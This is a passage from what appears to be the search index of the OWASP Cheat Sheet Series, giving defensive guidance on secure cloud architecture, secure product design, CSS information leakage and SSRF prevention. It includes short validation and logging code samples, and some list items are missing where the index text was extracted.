This method involves indirect access through tooling such as a managed or self-managed service running on ephemeral or persistent infrastructure. This infrastructure contains a persistent control plane IAM credential, which interacts with the object storage on the user's behalf. The method is best used when the application has other user interfaces or data systems available, when it is important to hide as much of the storage system as possible, or when the information shouldn't/won't be seen by an end user (metadata). It can be used in combination with web authentication and logging to better track and control access to resources. The key security concern for this approach is relying on developed code or policies which could contain weaknesses.

Pros: No direct access to data; No user visibility to object storage; Identifiable and loggable access. Cons: Potential use of broad IAM policy; Credential loss gives access to control plane APIs; Credentials could be hardcoded.

This approach is acceptable for sensitive user data, but must follow rigorous coding and cloud best practices, in order to properly secure data.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#signed-urls","title":"Signed URLs","text":"

URL signing for object storage involves using some method of either statically or dynamically generating URLs, which cryptographically guarantee that an entity can access a resource in storage. This is best used when direct access to specific user files is necessary or preferred, as there is no file transfer overhead. It is advisable to only use this method for user data which is not very sensitive. This method can be secure, but it has notable cons: code injection may still be possible if the method of signed URL generation is custom, dynamic, and injectable, and anyone given the URL can access the resource anonymously. Developers must also consider if and when the signed URL should expire, adding to the complexity of the approach.
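A minimal signed-URL sketch using boto3 for S3 (bucket, key, and expiry are placeholders); note that anyone holding the URL can fetch the object anonymously until it expires:

import boto3\n\ns3 = boto3.client('s3')\n\nurl = s3.generate_presigned_url(\n    'get_object',\n    Params={'Bucket': 'user-uploads', 'Key': 'reports/user-123.pdf'},\n    ExpiresIn=900,  # seconds; choose the shortest practical lifetime\n)\n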

Pros: Access to only one resource; Minimal user visibility to object storage; Efficient file transfer. Cons: Anonymous access; Anyone can access with the URL; Possibility of injection with custom code.
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-object-storage","title":"Public Object Storage","text":"

This is not an advisable method for resource storage and distribution, and should only be used for public, non-sensitive, generic resources. This storage approach will provide threat actors additional reconnaissance into a cloud environment, and any data which is stored in this configuration for any period of time must be considered publicly accessed (leaked to the public).

Pros: Efficient access to many resources; Simple public file share. Cons: Anyone can access/No privacy; Unauthenticated access to objects; Visibility into full file system; Accidentally leaking stored info.
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs-and-subnets","title":"VPCs and Subnets","text":"

Virtual Private Clouds (VPC) and public/private network subnets allow an application and its network to be segmented into distinct chunks, adding layers of security within a cloud system. Unlike other private vs public trade-offs, an application will likely incorporate most or all of these components in a mature architecture. Each is explained below.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs","title":"VPCs","text":"

VPCs are used to create network boundaries within an application, wherein components can talk to each other, much like a physical network in a data center. The VPC will be made up of some number of subnets, both public and private. VPCs can be used to:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-subnets","title":"Public Subnets","text":"

Public subnets house components which will have an internet facing presence. The subnet will contain network routing elements to allow components within the subnet to connect directly to the internet. Some use cases include:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#private-subnets","title":"Private Subnets","text":"

Private subnets house components which should not have direct internet access. The subnet will likely contain network routing to connect it to public subnets, to receive internet traffic in a structured and protected way. Private subnets are great for:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#simple-architecture-example","title":"Simple Architecture Example","text":"

Consider the simple architecture diagram below. A VPC will house all of the components for the application, but each element will be in a specific subnet depending on its role within the system. The normal flow for interacting with this application might look like:

  1. Accessing the application through some sort of internet gateway, API gateway or other internet facing component.
  2. This gateway connects to a load balancer or a web server in a public subnet. Both components provide public facing functions and are secured accordingly.
  3. These components then interact with their appropriate backend counterparts, a database or backend server, contained in a private subnet. These connections are more limited, preventing extraneous access to the possibly \"soft\" backend systems.

Note: This diagram intentionally skips routing and IAM elements for subnet interfacing, for simplicity and to be service provider agnostic.

This architecture prevents less hardened backend components or higher risk services like databases from being exposed to the internet directly. It also gives common, public-facing functionality access to the internet while avoiding additional routing overhead. This architecture can be secured more easily by focusing security on the entry points and separating functionality, putting non-public or sensitive information inside a private subnet where it is harder for external parties to access.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#trust-boundaries","title":"Trust Boundaries","text":"

Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Put another way, a trust boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking, however, trusting each component to perform its function correctly and securely suffices. Therefore, trust boundaries will likely occur in the connections between cloud components, and between the application and third-party elements, like end users and other vendors.

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an ephemeral IAM server which controls access for the stored resources (using an approach like the IAM Access section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#exploring-different-levels-of-trust","title":"Exploring Different Levels of Trust","text":"

Architects have to select a trust configuration between components, using quantitative factors like risk score/tolerance and velocity of project, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource, shown as a color from green (safe) to red (dangerous), outlines which resources shouldn't be trusted.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#1-no-trust-example","title":"1. No trust example","text":"

As shown in the diagram below, this example outlines a model where no component trusts any other component, regardless of criticality or threat level. This type of trust configuration would likely be used for incredibly high risk applications, where either very personal data or important business data is contained, or where the application as a whole has an extremely high business criticality.

Notice that both the API gateway and compute components call out to the auth/identity server. This implies that no data passing between these components, even when right next to each other \"inside\" the application, is considered trusted. The compute instance must then assume an ephemeral identity to access the storage, as the compute instance isn't trusted to a specific resource even if the user is trusted to the instance.

Also note the lack of trust between the auth/identity server and ephemeral IAM server and each component. While not displayed in the diagram, this would have additional impacts, like more rigorous checks before authentication, and possibly more overhead dedicated to cryptographic operations.

This could be a necessary approach for applications found in financial, military or critical infrastructure systems. However, security must be careful when advocating for this model, as it will have significant performance and maintenance drawbacks.

Pros: High assurance of data integrity; Defense in depth. Cons: Slow and inefficient; Complicated; Likely more expensive.
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#2-high-trust-example","title":"2. High trust example","text":"

Next, consider the opposite approach, where everything is trusted. In this instance, the \"dangerous\" user input is trusted and essentially handed directly to a high criticality business component. The auth/identity resource is not used at all. In this instance, there is a higher likelihood of a successful attack against the system, because there are no controls in place to prevent it. Additionally, this setup could be considered wasteful, as both the auth/identity and ephemeral IAM servers are not necessarily performing their intended function. (These could be shared corporate resources that aren't being used to their full potential.)

This is an unlikely architecture for all but the simplest and lowest risk applications. Do not use this trust boundary configuration unless there is no sensitive content to protect or efficiency is the only metric for success. Trusting user input is never recommended, even in low risk applications.

Pros: Efficient; Simple. Cons: Insecure; Potentially wasteful; High risk of compromise.
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#3-some-trust-example","title":"3. Some trust example","text":"

Most applications will use a trust boundary configuration like this. Using knowledge from a risk and attack surface analysis, security can reasonably assign trust to low risk components or processes, and verify only when necessary. This prevents wasting valuable security resources, but also limits the complexity and efficiency loss due to additional security overhead.

Notice in this example that the API gateway checks the auth/identity of a user, then immediately passes the request on to the compute instance. The instance doesn't need to re-verify, and performs its operation. However, as the compute instance is working with untrusted user inputs (designated yellow for some trust), it is still necessary to assume an ephemeral identity to access the storage system.

By nature, this approach limits the pros and cons of both previous examples. This model will likely be used for most applications, unless the benefits of the above examples are necessary to meet business requirements.

Pros: Secured based on risk; Cost/efficiency derived from criticality. Cons: Known gaps in security.

Note: This trust methodology diverges from Zero Trust. For a more in depth look at that topic, check out CISA's Zero Trust Maturity Model.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#security-tooling","title":"Security Tooling","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#web-application-firewall","title":"Web Application Firewall","text":"

Web application firewalls (WAF) are used to monitor or block common attack payloads (like XSS and SQLi), or allow only specific request types and patterns. Applications should use them as a first line of defense, attaching them to entry points like load balancers or API gateways, to handle potentially malicious content before it reaches application code. Cloud providers curate base rule sets which will block or monitor common malicious payloads:

By design these rule sets are generic and will not cover every attack type an application will face. Consider creating custom rules which will fit the application's specific security needs, like:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging-monitoring","title":"Logging & Monitoring","text":"

Logging and monitoring are required for a truly secure application. Developers should know exactly what is going on in their environment, making use of alerting mechanisms to warn engineers when systems are not working as expected. Additionally, in the event of a security incident, logging should be verbose enough to track a threat actor through an entire application, and provide enough knowledge for responders to understand what actions were taken against what resources. Note that proper logging and monitoring can be expensive, and risk/cost trade-offs should be discussed when putting logging in place.
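
As a minimal, framework-agnostic sketch of the kind of logging described above, the snippet below uses Python's standard logging module to emit structured, single-line JSON events; the logger name, field names, and example values are illustrative assumptions rather than a prescribed schema:

import json
import logging

class JsonFormatter(logging.Formatter):
    """Render each log record as a single JSON line for easy ingestion."""
    def format(self, record):
        entry = {
            "time": self.formatTime(record),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            # Extra context attached via the `extra` argument, if present
            "user_id": getattr(record, "user_id", None),
            "source_ip": getattr(record, "source_ip", None),
        }
        return json.dumps(entry)

handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
security_log = logging.getLogger("app.security")
security_log.addHandler(handler)
security_log.setLevel(logging.INFO)

# Example: record a failed authorization attempt with enough context
# for responders to trace the actor and the targeted resource.
security_log.warning(
    "authorization denied for resource /admin/users",
    extra={"user_id": "u-123", "source_ip": "203.0.113.7"},
)

Structured events like these are generally easier to search and alert on than free-form text when tracing a threat actor through an application.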

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging","title":"Logging","text":"

For proper logging, consider:

Legal and compliance representatives should weigh in on log retention times for the specific application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

For proper monitoring consider adding:

Anomalies by count and type can vary wildly from app to app. A proper understanding of what qualifies as an anomaly requires an environment-specific baseline. Therefore, the percentages mentioned above should be chosen based on that baseline, in addition to considerations like risk and team response capacity.

WAFs can also have monitoring or alerting attached to them for counting malicious payloads or (in some cases) anomalous activity detection.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#ddos-protection","title":"DDoS Protection","text":"

Cloud service companies offer a range of simple and advanced DDoS protection products, depending on application needs. Simple DDoS protection can often be employed using WAFs with rate limits and route blocking rules, while more advanced protection may require specific managed tooling offered by the cloud provider. Examples include:

The decision to enable advanced DDoS protections for a specific application should be based on the risk and business criticality of the application, taking into account mitigating factors and cost (these services can be very inexpensive compared to large company budgets).

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#self-managed-tooling-maintenance","title":"Self-managed tooling maintenance","text":"

Cloud providers generally offer tooling on a spectrum of management. Fully managed services leave very little for the end developer to handle besides coding functionality, while self-managed systems require much more overhead to maintain.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#update-strategy-for-self-managed-services","title":"Update Strategy for Self-managed Services","text":"

Self-managed tooling will require additional overhead from developers and support engineers. Depending on the tool, basic version updates, upgrades to images like AMIs or Compute Images, or other operating-system-level maintenance will be required. Use automation to regularly update minor versions or images, and schedule time in development cycles for refreshing stale resources.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#avoid-gaps-in-managed-service-security","title":"Avoid Gaps in Managed Service Security","text":"

Managed services will offer some level of security, like updating and securing the underlying hardware which runs application code. However, the development team is still responsible for many aspects of security in the system. Ensure developers understand what security will be their responsibility based on tool selection. The following will likely be partially or wholly the responsibility of the developer:

Use documentation from the cloud provider to understand which security responsibilities fall to which party. Examples of this research for serverless functions:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html","title":"Secure Product Design Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The purpose of Secure Product Design is to ensure that all products meet or exceed the security requirements laid down by the organization as part of the development lifecycle, and that all security decisions made about the product being developed are explicit choices that result in the correct level of security for it.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#methodology","title":"Methodology","text":"

As a basic start, establish secure defaults, minimise the attack surface area, and fail securely to those well-defined and understood defaults.

Secure Product Design comes about through two processes:

  1. Product Inception; and
  2. Product Design

The first process happens when a product is conceived, or when an existing product is being re-invented. The second is continuous, evolutionary, and done in an agile way, close to where the code is being written.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-principles","title":"Security Principles","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-the-principle-of-least-privilege-and-separation-of-duties","title":"1. The principle of Least Privilege and Separation of Duties","text":"

Least Privilege is a security principle that states that users should only be given the minimum amount of access necessary to perform their job, and no more. This helps to reduce the risk of unauthorized access to sensitive data or systems, as users are only able to access the resources they need. Least Privilege is an important security principle that should be followed in order to ensure the security of an organization's data and systems.

Separation of duties is a fundamental principle of internal control in business and organizations. It is a system of checks and balances that ensures that no single individual has control over all aspects of a transaction. This is done by assigning different tasks to different people, so that no one person has control over the entire process. This helps to reduce the risk of fraud and errors, as well as ensuring that all tasks are completed in a timely manner. Separation of duties is an important part of any organization's internal control system, and is essential for maintaining the integrity of the organization's financial records.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-the-principle-of-defense-in-depth","title":"2. The principle of Defense-in-Depth","text":"

The principle of Defense-in-Depth is a security strategy that involves multiple layers of security controls to protect an organization\u2019s assets. It is based on the idea that if one layer of security fails, the other layers will still be able to protect the asset. The layers of security can include physical security, network security, application security, and data security. The goal of Defense-in-Depth is to create a secure environment that is resilient to attack and can quickly detect and respond to any security incidents. By implementing multiple layers of security, organizations can reduce the risk of a successful attack and minimize the damage caused by any successful attack.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-the-principle-of-zero-trust","title":"3. The principle of Zero Trust","text":"

Zero Trust is a security model that assumes that all users, devices, and networks are untrusted and must be verified before access is granted. It is based on the idea that organizations should not trust any user, device, or network, even if they are inside the organization\u2019s network. Instead, all requests for access must be authenticated and authorized before access is granted. Zero Trust also requires organizations to continuously monitor and audit user activity to ensure that access is only granted to those who need it. This model is designed to reduce the risk of data breaches and other security incidents by ensuring that only authorized users have access to sensitive data.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-the-principle-of-security-in-the-open","title":"4. The principle of Security-in-the-Open","text":"

Security-in-the-Open is a concept that emphasizes the importance of security in open source software development. It focuses on the need for developers to be aware of the security implications of their code and to take steps to ensure that their code is secure. This includes using secure coding practices, testing for vulnerabilities, and using secure development tools. Security-in-the-Open also encourages developers to collaborate with security experts to ensure that their code is secure.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-focus-areas","title":"Security Focus Areas","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-context","title":"1. Context","text":"

Where does this application under consideration fit into the ecosystem of the organization, which departments use it and for what reason? What kinds of data might it contain, and what is the risk profile as a result?

The processes employed to build the security context for an application include Threat Modeling - which results in security-related stories being added during Product Design at every iteration of product delivery - and Business Impact Assessment - which results in setting the correct Product Security Levels for a given product during Product Inception.

Context is all important because over-engineering for security can have even greater cost implications than over-engineering for scale or performance, but under-engineering can have devastating consequences too.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-components","title":"2. Components","text":"

From libraries in use by the application (selected during any Product Design stage) through to external services it might make use of (changes to which happen during Product Inception), what makes up this application and how are those parts kept secure? To do this, we leverage a library of secure design patterns and ready-to-use components defined in your Golden Path / Paved Road documentation, and we analyze those choices through Threat Modeling.

A part of this component review must also include the more commercial aspects of selecting the right components (licensing and maintenance) as well as the limits on usage that might be required.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-connections","title":"3. Connections","text":"

How do you interact with this application and how does it connect to those components and services mentioned before? Where is the data stored and how is it accessed? Connections can also describe any intentional lack of connections. Think about the segregation of tiers that might be required depending on the Product Security Levels required and the potential segregation of data or whole environments if required for different tenants.

Adding (or removing) connections is probably a sign that Product Inception is happening.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-code","title":"4. Code","text":"

Code is the ultimate expression of the intention for a product and as such it must be functional first and foremost. But the quality of how that functionality is provided must also meet or exceed the expectations placed on it.

Some basics of secure coding include:

  1. Input validation: Verify that all input data is valid and of the expected type, format, and length before processing it. This can help prevent attacks such as SQL injection and buffer overflows.
  2. Error handling: Handle errors and exceptions in a secure manner, such as by logging them in a secure way and not disclosing sensitive information to an attacker.
  3. Authentication and Authorization: Implement strong authentication and authorization mechanisms to ensure that only authorized users can access sensitive data and resources.
  4. Cryptography: Use cryptographic functions and protocols to protect data in transit and at rest, such as HTTPS and encryption - the expected levels for a given Product Security Level can often be found by reviewing your Golden Path / Paved Road documentation.
  5. Least privilege: Use the principle of the least privilege when writing code, such that the code and the system it runs on are given the minimum access rights necessary to perform their functions.
  6. Secure memory management: Use high-level languages recommended in your Golden Path / Paved Road documentation or properly manage memory to prevent memory-related vulnerabilities such as buffer overflows and use-after-free.
  7. Avoiding hardcoded secrets: Hardcoded secrets such as passwords and encryption keys should be avoided in the code; store them in secure storage instead.
  8. Security testing: Test the software for security vulnerabilities during development and just prior to deployment.
  9. Auditing and reviewing the code: Regularly audit and review the code for security vulnerabilities, such as by using automated tools or having a third party review the code.
  10. Keeping up-to-date: Keep the code up-to-date with the latest security best practices and vulnerability fixes to ensure that the software is as secure as possible.

Ensure that you integrate plausibility checks at each tier of your application (e.g., from frontend to backend) and ensure that you write unit and integration tests to validate that all threats discovered during Threat Modeling have been mitigated to a level of risk acceptable to the organization. Use that to compile use-cases and abuse-cases for each tier of your application.
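
As an illustration of turning threat-model findings into tests, the sketch below pairs a backend plausibility check with a use-case and two abuse-case unit tests; the display-name rule, function names, and test inputs are hypothetical assumptions chosen only to show the pattern:

import re
import unittest

# Hypothetical business rule: a display name starts with a letter and is at most 50 characters.
NAME_PATTERN = re.compile(r"^[A-Za-z][A-Za-z' -]{0,49}$")

def validate_display_name(value: str) -> str:
    """Plausibility check applied again at the backend tier, not only in the frontend."""
    if not isinstance(value, str) or not NAME_PATTERN.fullmatch(value):
        raise ValueError("invalid display name")
    return value

class DisplayNameAbuseCases(unittest.TestCase):
    def test_use_case_valid_name(self):
        self.assertEqual(validate_display_name("Ada Lovelace"), "Ada Lovelace")

    def test_abuse_case_script_injection(self):
        with self.assertRaises(ValueError):
            validate_display_name("<script>alert(1)</script>")

    def test_abuse_case_oversized_input(self):
        with self.assertRaises(ValueError):
            validate_display_name("A" * 5000)

if __name__ == "__main__":
    unittest.main()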

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#5-configuration","title":"5. Configuration","text":"

Building an application securely can all too easily be undone if it's not securely configured. At a minimum we should ensure the following:

  1. Bearing in mind the principle of Least Privilege: Limit the access and permissions of system components and users to the minimum required to perform their tasks.
  2. Remembering Defense-in-Depth: Implement multiple layers of security controls to protect against a wide range of threats.
  3. Ensuring Secure by Default: Configure systems and software to be secure by default, with minimal manual setup or configuration required.
  4. Secure Data: Protect sensitive data, such as personal information and financial data, by encrypting it in transit and at rest. Protecting that data also means ensuring it's correctly backed up and that the data retention is set correctly for the desired Product Security Level.
  5. Plan to have the configuration Fail Securely: Design systems to fail in a secure state, rather than exposing vulnerabilities when they malfunction.
  6. Always use Secure Communications: Use secure protocols for communication, such as HTTPS, to protect against eavesdropping and tampering.
  7. Perform regular updates - or leverage maintained images: Keeping software, docker images and base operating systems up-to-date with the latest security patches is an essential part of maintaining a secure system.
  8. Have a practiced Security Incident response plan: Having a plan in place for how to respond to a security incident is essential for minimizing the damage caused by any successful attack and a crucial part of the Product Support Model.

Details of how to precisely ensure secure configuration can be found in the Infrastructure as Code Security Cheat Sheet.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html","title":"Securing Cascading Style Sheets Cheat Sheet","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this CSS (not XSS, but Cascading Style Sheets) Cheat Sheet is to give Programmers, Testers, Security Analysts, Front-End Developers and anyone interested in Web Application Security a set of recommendations and requirements to achieve better security when authoring Cascading Style Sheets.

Let's demonstrate this risk with an example:

Santhosh is a programmer who works for a company called X and authors a Cascading Style Sheet to implement styling of the web application. The application for which he is writing CSS Code has various roles like Student, Teacher, Super User & Administrator and these roles have different permissions (PBAC - Permission Based Access Control) and Roles (RBAC - Role Based Access Control). Not only do these roles have different access controls, but these roles could also have different styling for webpages that might be specific to an individual or group of roles.

Santhosh thinks that it would be a great optimization to create a \"global styling\" CSS file which has all the CSS styling/selectors for all of the roles. According to their role, a specific feature or user interface element will be rendered. For instance, Administrator will have different features compared to Student or Teacher or SuperUser. However, some permissions or features may be common to some roles.

Example: Profile Settings will be applicable to all the users here while Adding Users or Deleting Users is only applicable for Administrator.

Example:

Now, let's examine the risks associated with this style of coding.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-1","title":"Risk #1","text":"

Motivated Attackers always take a look at *.CSS files to learn the features of the application even without being logged in.

For instance: Jim is a motivated attacker and always tries to look into CSS files from the View-Source even before other attacks. When Jim looks into the CSS file, he sees that there are different features and different roles based on the CSS selectors like .profileSettings, .editUser, .addUser, .deleteUser and so on. Jim can use the CSS for intel gathering to help gain access to sensitive roles. This is a form of attacker due diligence even before trying to perform dangerous attacks to gain access to the web application.

In a nutshell, having global styling could reveal sensitive information that could be beneficial to the attacker.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-2","title":"Risk #2","text":"

Let's say Santhosh has a habit of writing descriptive selector names like .profileSettings, .exportUserData, .changePassword, .oldPassword, .newPassword, .confirmNewPassword etc. Good programmers like to keep code readable and usable by other code reviewers on the team. The risk is that attackers could map these selectors to actual features of a web application.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defensive-mechanisms-to-mitigate-attackers-motivation","title":"Defensive Mechanisms to Mitigate Attacker's Motivation","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-1","title":"Defense Mechanism #1","text":"

As a CSS coder / programmer, always keep the CSS isolated by access control level. By this, it means Student will have a different CSS file called StudentStyling.CSS while Administrator has AdministratorStyling.CSS and so on. Make sure that only users with the proper access control level can access their corresponding *.CSS file.

If an authenticated user with the Student Role tries to access AdministratorStyling.CSS through forced browsing, an alert that an intrusion is occurring should be recorded.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-2","title":"Defense Mechanism #2","text":"

Another option is to modify your CSS files to remove any identifying information. As a general rule, it's recommended that your website have a consistent style between pages, and it's best to write your general CSS rules in such a way that they apply across multiple pages. This reduces the need for specific selectors in the first place. Furthermore, it's often possible to create CSS selectors that target specific HTML elements without using IDs or class names. For example, #UserPage .Toolbar .addUserButton could be rewritten to something more obscure such as #page_u header button:first-of-type.

Build-time and runtime tools also exist, which can be integrated to obfuscate your class names. This can reduce the chance of an attacker guessing the features of your application. Some examples:

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-3","title":"Defense Mechanism #3","text":"

Web applications that allow users to author content via HTML input could be vulnerable to malicious use of CSS. Uploaded HTML could use styles that are allowed by the web application but could be used for purposes other than intended which could lead to security risks.

Example: You can read about how LinkedIn had a vulnerability which allowed malicious use of CSS to execute a Clickjacking attack. This caused the document to enter a state where clicking anywhere on the page would result in loading a potentially malicious website. You can read more about mitigating clickjacking attacks here.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Server-Side Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of this cheat sheet is to provide advice regarding protection against Server-Side Request Forgery (SSRF) attacks.

This cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. This talk from the security researcher Orange Tsai as well as this document provide techniques on how to perform this kind of attack.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

SSRF is an attack vector that abuses an application to interact with the internal/external network or the machine itself. One of the enablers for this vector is the mishandling of URLs, as showcased in the following examples:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#overview-of-a-ssrf-common-flow","title":"Overview of a SSRF common flow","text":"

Notes:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#cases","title":"Cases","text":"

Depending on the application's functionality and requirements, there are two basic cases in which SSRF can happen:

Because these two cases are very different, this cheat sheet will describe defences against them separately.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-1-application-can-send-request-only-to-identified-and-trusted-applications","title":"Case 1 - Application can send request only to identified and trusted applications","text":"

Sometimes, an application needs to perform a request to another application, often located on another network, to perform a specific task. Depending on the business case, user input is required for the functionality to work.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#example","title":"Example","text":"

Take the example of a web application that receives and uses personal information from a user, such as their first name, last name, birth date etc. to create a profile in an internal HR system. By design, that web application will have to communicate using a protocol that the HR system understands to process that data. Basically, the user cannot reach the HR system directly, but, if the web application in charge of receiving user information is vulnerable to SSRF, the user can leverage it to access the HR system. The user leverages the web application as a proxy to the HR system.

The allow list approach is a viable option since the internal application called by the VulnerableApplication is clearly identified in the technical/business flow. It can be stated that the required calls will only be targeted between those identified and trusted applications.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections","title":"Available protections","text":"

Several protective measures are possible at the Application and Network layers. To apply the defense in depth principle, both layers will be hardened against such attacks.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer","title":"Application layer","text":"

The first level of protection that comes to mind is Input validation.

Based on that point, the following question comes to mind: How to perform this input validation?

As Orange Tsai shows in his talk, depending on the programming language used, parsers can be abused. One possible countermeasure is to apply the allow list approach when input validation is used because, most of the time, the format of the information expected from the user is globally known.

The request sent to the internal application will be based on the following information:

Note: Disable support for following redirects in your web client in order to prevent the bypass of the input validation described in the section Exploitation tricks > Bypassing restrictions > Input validation > Unsafe redirect of this document.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#string","title":"String","text":"

In the context of SSRF, validations can be added to ensure that the input string respects the business/technical format expected.

A regex can be used to ensure that data received is valid from a security point of view if the input data has a simple format (e.g. token, zip code, etc.). Otherwise, validation should be conducted using the libraries available from the string object, because regexes for complex formats are difficult to maintain and are highly error-prone.

User input is assumed to be non-network related and consists of the user's personal information.

Example:

// Regex validation for data having a simple format
if (Pattern.matches("[a-zA-Z0-9\\s\\-]{1,50}", userInput)) {
    // Continue the processing because the input data is valid
} else {
    // Stop the processing and reject the request
}
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#ip-address","title":"IP address","text":"

In the context of SSRF, there are 2 possible validations to perform:

  1. Ensure that the data provided is a valid IP V4 or V6 address.
  2. Ensure that the IP address provided belongs to one of the IP addresses of the identified and trusted applications.

The first layer of validation can be applied using libraries that ensure the security of the IP address format, based on the technology used (a library is proposed here to delegate the handling of the IP address format and leverage a battle-tested validation function):

Verification of the proposed libraries has been performed regarding the exposure to bypasses (Hex, Octal, Dword, URL and Mixed encoding) described in this article.

Use the output value of the method/library as the IP address to compare against the allow list.

After ensuring the validity of the incoming IP address, the second layer of validation is applied. An allow list is created after determining all the IP addresses (v4 and v6 to avoid bypasses) of the identified and trusted applications. The valid IP is cross-checked against that list to ensure its communication with the internal application (strict, case-sensitive string comparison).
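
A minimal sketch of these two validation layers in Python, using the standard ipaddress module, is shown below; the allow list contents and the function name are illustrative assumptions:

import ipaddress

# Hypothetical allow list of the identified and trusted applications (IPv4 and IPv6).
ALLOWED_IPS = {"10.0.10.20", "2001:db8::20"}

def is_allowed_target(user_supplied_ip: str) -> bool:
    # First layer: reject anything that is not a syntactically valid IPv4/IPv6 address.
    try:
        parsed = ipaddress.ip_address(user_supplied_ip.strip())
    except ValueError:
        return False
    # Second layer: compare the library's canonical output (not the raw user input,
    # which defeats hex/octal/dword encodings) against the allow list.
    return str(parsed) in ALLOWED_IPS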

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#domain-name","title":"Domain name","text":"

When attempting to validate domain names, it is tempting to perform a DNS resolution to verify the existence of the domain. In general, it is not a bad idea, yet it opens up the application to attacks depending on the configuration of the DNS servers used for domain name resolution:

In the context of SSRF, there are two validations to perform:

  1. Ensure that the data provided is a valid domain name.
  2. Ensure that the domain name provided belongs to one of the domain names of the identified and trusted applications (this is where allow listing comes into play).

Similar to the IP address validation, the first layer of validation can be applied using libraries that ensure the security of the domain name format, based on the technology used (a library is proposed here in order to delegate the handling of the domain name format and leverage a battle-tested validation function):

